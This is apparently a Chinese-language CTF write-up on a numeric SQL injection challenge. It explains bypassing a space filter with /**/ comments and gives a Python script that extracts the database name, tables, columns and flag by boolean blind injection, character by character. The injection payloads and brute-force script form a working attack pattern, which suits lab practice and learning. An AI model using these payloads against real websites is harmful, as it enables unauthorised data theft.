1.测试输入发现存在数字型sql注入

1 and 1 报错

尝试了几个字符，确定空格被过滤了

空格用/**/替换

1/**/and/**/1 构造轮子尝试成功，所以这里要用布尔注入

后面的思路就是比较常规的了，先爆破库名，再爆破表、字段

写了个脚本简单破了一下

import requests
import time

url1 = "http://5bd21334-0399-4bb8-93b0-49b562b0a1f0.node5.buuoj.cn:81/?stunum="
data = ""

for i in range(1,400):
    for j in range(31,128):
        payload1 = 'if(ascii(substr(database(),{},1))={},1,0)'.format(i,j)    #库名
        payload2 = 'if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)="ctf"),{},1))={},1,0)'.format(i,j)#表名
        #           if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='ctf'),{},1))>{})".format(i,mid)
        payload3 = 'if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)="flag"),{},1))={},1,0)'.format(i,j)#列名
        payload4 = 'if(ascii(substr((select(value)from(flag)),{},1))={},1,0)'.format(i,j)#字段值

        r = requests.get(url = url1 + payload4 )
        if r.status_code == 429:
            print("too fast")
            time.sleep(1)
        if r"Hi admin, your score is: 100" in r.text:
            data += chr(j)
            print(data)